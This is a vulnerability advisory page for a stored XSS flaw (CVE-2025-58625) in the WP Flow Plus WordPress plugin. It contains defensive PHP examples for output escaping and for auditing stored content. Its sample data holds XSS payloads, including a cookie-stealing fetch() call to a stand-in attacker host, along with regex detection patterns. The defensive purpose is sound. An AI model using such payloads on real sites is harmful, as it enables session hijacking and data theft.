Description
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Spiffy Plugins WP Flow Plus wp-imageflow2 allows Stored XSS. This issue affects WP Flow Plus: from n/a through <= 5.2.5.
Published: 2025-09-03
Score: 5.9 Medium
EPSS: < 1% Very Low
KEV: No
Impact: n/a
Action: n/a
AI Analysis

Impact

The vulnerability is a Stored Cross-Site Scripting flaw, classified as CWE-79: user-supplied input is saved by the plugin and later written into a generated page without being neutralized for its HTML context. Script embedded in that stored content executes in the browser of every user who views the affected page, under that user's session, which permits session hijacking, defacement, or redirection of victims to attacker-controlled content.
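As an added illustration (this is not code from WP Flow Plus, whose source the page does not show), the PHP below contrasts the unescaped rendering pattern that produces CWE-79 with a version escaped per output context, and adds a parser-based check a reviewer can run on either. The gallery item layout, the `wpfp_render_item_*` / `wpfp_output_is_inert` names and the sample values are assumptions; `esc_html()`, `esc_attr()` and `esc_url()` are the real WordPress core functions, with simplified stand-ins defined so the script also runs under plain `php` (with the dom extension) outside WordPress.

```php
<?php
// Added example, not code from WP Flow Plus. The stand-ins below let the script run
// under plain `php` outside WordPress; inside a plugin the real esc_html(),
// esc_attr() and esc_url() from WordPress core are used instead.
if (!function_exists('esc_html')) {
    function esc_html(string $s): string {
        return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    }
}
if (!function_exists('esc_attr')) {
    function esc_attr(string $s): string {
        return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    }
}
if (!function_exists('esc_url')) {
    // Simplified stand-in: only http(s) URLs survive; WordPress's own esc_url()
    // applies a fuller allowed-protocol list.
    function esc_url(string $s): string {
        return preg_match('#^https?://#i', $s) ? esc_attr($s) : '';
    }
}

// Constructed gallery item, standing in for what a high-privileged user (PR:H in
// the CVSS vector) could save through the plugin's settings screen.
$item = [
    'src'     => 'javascript:alert(document.cookie)',
    'title'   => 'Sunset" onmouseover="alert(1)',
    'caption' => 'Nice view <img src=x onerror=alert(document.domain)>',
];

// CWE-79 pattern: stored values concatenated straight into the generated page.
function wpfp_render_item_vulnerable(array $item): string {
    return '<div class="imageflow-item">'
         . '<img src="' . $item['src'] . '" title="' . $item['title'] . '">'
         . '<p class="caption">' . $item['caption'] . '</p>'
         . '</div>';
}

// Hardened: each value escaped for the context it lands in (URL attribute,
// plain attribute, element text).
function wpfp_render_item_hardened(array $item): string {
    return '<div class="imageflow-item">'
         . '<img src="' . esc_url($item['src']) . '" title="' . esc_attr($item['title']) . '">'
         . '<p class="caption">' . esc_html($item['caption']) . '</p>'
         . '</div>';
}

// Reviewer check: parse the rendering the way a browser would and look for what
// stored XSS needs to execute: a <script> element, an on* attribute, or a
// javascript: src/href. Requires PHP's dom extension.
function wpfp_output_is_inert(string $html): bool {
    $doc = new DOMDocument();
    libxml_use_internal_errors(true);
    $doc->loadHTML('<!DOCTYPE html><html><body>' . $html . '</body></html>');
    libxml_clear_errors();
    foreach ($doc->getElementsByTagName('*') as $el) {
        if (strtolower($el->tagName) === 'script') {
            return false;
        }
        foreach ($el->attributes as $attr) {
            $name = strtolower($attr->name);
            if (strncmp($name, 'on', 2) === 0) {
                return false;
            }
            if (($name === 'src' || $name === 'href')
                && stripos(ltrim($attr->value), 'javascript:') === 0) {
                return false;
            }
        }
    }
    return true;
}

echo wpfp_render_item_vulnerable($item), PHP_EOL;
echo wpfp_render_item_hardened($item), PHP_EOL;
var_dump(wpfp_output_is_inert(wpfp_render_item_vulnerable($item)));
var_dump(wpfp_output_is_inert(wpfp_render_item_hardened($item)));
```

Run with `php example.php`: the vulnerable rendering fails the check because the parser sees an `onmouseover` attribute, a `javascript:` src and the injected `onerror` image, while the hardened rendering passes. Note that the escaped title still contains the literal text `onmouseover=` inside its attribute value, which is exactly why the check walks the parsed DOM rather than grepping the markup.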

Affected Systems

The flaw is present in the Spiffy Plugins WP Flow Plus "wp‑imageflow2" plugin and affects all versions from the earliest release up to and including 5.2.5.

Risk and Exploitability

The CVSS 3.1 score of 5.9 (vector AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:L) places the issue at medium severity, and the EPSS score of under 1% indicates a low probability of exploitation at this time. The vulnerability is not listed in the CISA KEV catalog, and the SSVC assessment records no known exploitation and rates it as not automatable. The PR:H and UI:R components mean an attacker needs a high-privileged account to store the payload through the plugin's content entry points, and a victim must then load the page that renders it; the scope is rated as changed, as is usual for XSS, because the impact lands in the victim's browser rather than in the vulnerable component.

Generated by OpenCVE AI on April 30, 2026 at 02:49 UTC.

Remediation

No vendor fix or workaround currently provided.

OpenCVE Recommended Actions

  • Upgrade WP Flow Plus to a version newer than 5.2.5 once the vendor publishes one; this page lists no fixed version or workaround, so confirm in the vendor's changelog that a release actually addresses this issue before treating it as patched.
  • After upgrading, review any content the plugin stores for script tags, inline event handlers or javascript: URLs injected before the fix; output escaping stops them from executing, but stored payloads should still be removed.
  • Restrict the ability to edit plugin-related content to trusted administrators; since the vector requires high privileges, this limits who can plant a payload rather than adding a new barrier.
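The review step above, as an added example that is neither WP Flow Plus code nor OpenCVE tooling: a PHP audit that walks stored values (strings or nested arrays, the shape `get_option()` returns) and reports leaves that match patterns worth a human look. The option names and sample data are constructed, because the page does not say where the plugin stores its content; on a real site the values would be fetched with `get_option()` or a `$wpdb` query and the script run through `wp eval-file` or a mu-plugin.

```php
<?php
// Added example for the post-upgrade review step. Not WP Flow Plus code; the option
// names below are placeholders because the page does not name where the plugin
// stores its data. Real values would come from get_option() (already unserialized)
// or a $wpdb query; here they are constructed inline so the script runs stand-alone.

// Patterns that warrant a human look. They are deliberately broad: the goal is to
// surface candidates, not to prove a string is harmless.
const WPFP_AUDIT_PATTERNS = [
    'script tag'           => '/<\s*script\b/i',
    'inline event handler' => '/\bon[a-z]+\s*=/i',
    'javascript: URL'      => '/javascript\s*:/i',
    'data:text/html URL'   => '/data\s*:\s*text\/html/i',
    'iframe/object/embed'  => '/<\s*(iframe|object|embed)\b/i',
    'svg'                  => '/<\s*svg\b/i',
];

/**
 * Walk a stored value (string or nested array) and report every leaf that matches
 * one of the audit patterns. Returns a list of ['path', 'pattern', 'value'].
 */
function wpfp_audit_value($value, string $path = ''): array {
    $findings = [];
    if (is_array($value)) {
        foreach ($value as $k => $v) {
            $findings = array_merge($findings, wpfp_audit_value($v, $path . '[' . $k . ']'));
        }
        return $findings;
    }
    if (!is_string($value)) {
        return $findings;
    }
    // Check the raw form and an entity-decoded form, so a payload that a partial fix
    // stored as &lt;script&gt; (and that a later unescaped output would revive) is seen.
    $candidates = [$value, html_entity_decode($value, ENT_QUOTES | ENT_HTML5, 'UTF-8')];
    foreach (WPFP_AUDIT_PATTERNS as $label => $regex) {
        foreach ($candidates as $c) {
            if (preg_match($regex, $c)) {
                $findings[] = ['path' => $path, 'pattern' => $label, 'value' => $value];
                continue 2; // one report per pattern per leaf
            }
        }
    }
    return $findings;
}

function wpfp_audit_options(array $options): array {
    $all = [];
    foreach ($options as $name => $value) {
        $all = array_merge($all, wpfp_audit_value($value, $name));
    }
    return $all;
}

// Constructed sample of what a gallery plugin might keep in wp_options.
$stored = [
    'wpfp_gallery_items' => [
        ['src' => 'https://example.test/a.jpg', 'caption' => 'Harbour at dawn'],
        ['src' => 'https://example.test/b.jpg', 'caption' => 'Click <a href="javascript:alert(1)">here</a>'],
        ['src' => 'x', 'caption' => '<img src=x onerror="fetch(\'https://attacker.test/?c=\'+document.cookie)">'],
    ],
    'wpfp_settings' => ['width' => '640', 'footer' => '&lt;script&gt;alert(1)&lt;/script&gt;'],
];

foreach (wpfp_audit_options($stored) as $f) {
    printf("%-40s %-22s %s\n", $f['path'], $f['pattern'], $f['value']);
}
```

Each printed line is a candidate path such as `wpfp_gallery_items[1][caption]` with the pattern that matched; the clean first item produces no line, and the entity-encoded footer is still reported because the decoded form is checked as well. Treat hits as a worklist for manual review and removal, not as a verdict.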



Advisories
Source: EUVD
ID: EUVD-2025-26542
Title: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Spiffy Plugins WP Flow Plus allows Stored XSS. This issue affects WP Flow Plus: from n/a through 5.2.5.
History

Thu, 23 Apr 2026 15:00:00 +0000

Type: Metrics
Values Removed: -
Values Added: cvssV3_1 {'score': 5.9, 'vector': 'CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:L'}


Wed, 01 Apr 2026 23:45:00 +0000

Type: Description
Values Removed: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Spiffy Plugins WP Flow Plus allows Stored XSS. This issue affects WP Flow Plus: from n/a through 5.2.5.
Values Added: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Spiffy Plugins WP Flow Plus wp-imageflow2 allows Stored XSS. This issue affects WP Flow Plus: from n/a through <= 5.2.5.

Type: References
Values Removed: -
Values Added: -

Type: Metrics
Values Removed: -
Values Added: cvssV3_1 {'score': 5.9, 'vector': 'CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:L'}


Wed, 03 Sep 2025 19:45:00 +0000

Type: First Time appeared
Values Added: Spiffyplugins; Spiffyplugins wp Flow Plus; Wordpress; Wordpress wordpress

Type: Vendors & Products
Values Added: Spiffyplugins; Spiffyplugins wp Flow Plus; Wordpress; Wordpress wordpress

Wed, 03 Sep 2025 18:15:00 +0000

Type: Metrics
Values Removed: -
Values Added: ssvc {'options': {'Automatable': 'no', 'Exploitation': 'none', 'Technical Impact': 'partial'}, 'version': '2.0.3'}


Wed, 03 Sep 2025 14:45:00 +0000

Type: Description
Values Added: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Spiffy Plugins WP Flow Plus allows Stored XSS. This issue affects WP Flow Plus: from n/a through 5.2.5.

Type: Title
Values Added: WordPress WP Flow Plus Plugin <= 5.2.5 - Cross Site Scripting (XSS) Vulnerability

Type: Weaknesses
Values Added: CWE-79

Type: References
Values Added: -

Type: Metrics
Values Added: cvssV3_1 {'score': 5.9, 'vector': 'CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:L'}


Subscriptions

Spiffyplugins Wp Flow Plus
Wordpress Wordpress
MITRE

Status: PUBLISHED

Assigner: Patchstack

Published:

Updated: 2026-04-28T16:13:44.551Z

Reserved: 2025-09-03T09:03:04.975Z

Link: CVE-2025-58625

Vulnrichment

Updated: 2025-09-03T17:36:14.336Z

NVD

Status : Deferred

Published: 2025-09-03T15:15:45.627

Modified: 2026-04-23T15:33:29.117

Link: CVE-2025-58625

Redhat

No data.

OpenCVE Enrichment

Updated: 2026-04-30T03:00:15Z

Weaknesses